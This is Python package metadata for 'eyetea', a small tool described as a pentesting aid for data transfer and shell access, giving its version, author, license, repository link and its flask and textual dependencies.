Metadata-Version: 2.1
Name: eyetea
Version: 0.1.1
Summary: A pentesting tool that streamlines data transfer and shell access
Home-page: https://github.com/uhnomoli/eyetea
License: BSD-3-Clause
Author: Andrew Fricke
Author-email: andrew@uhnomoli.com
Requires-Python: >=3.11,<4.0
Classifier: License :: OSI Approved :: BSD License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Requires-Dist: flask (>=3.0.3,<4.0.0)
Requires-Dist: textual (>=0.73.0,<0.74.0)
Project-URL: Repository, https://github.com/uhnomoli/eyetea
